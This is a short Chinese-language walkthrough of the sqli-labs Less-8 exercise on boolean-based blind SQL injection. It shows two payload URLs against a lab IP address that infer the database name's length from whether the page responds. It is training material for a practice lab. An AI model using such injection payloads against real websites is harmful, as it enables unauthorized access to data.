Less-8 Blind-- Boolian Based基于布尔的盲注
1、回显分析
当输入的语句正确时,显示 You are in…
当输入的语句异常时,不显示任何信息
2、SQL盲注
根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in…
当语句不成立时,不显示任何信息。
先判断数据库名的长度:
http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – +
页面无信息显示,说明数据库名的长度小于10
http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>5) – +
有信息显示,说明数据名的长度大于5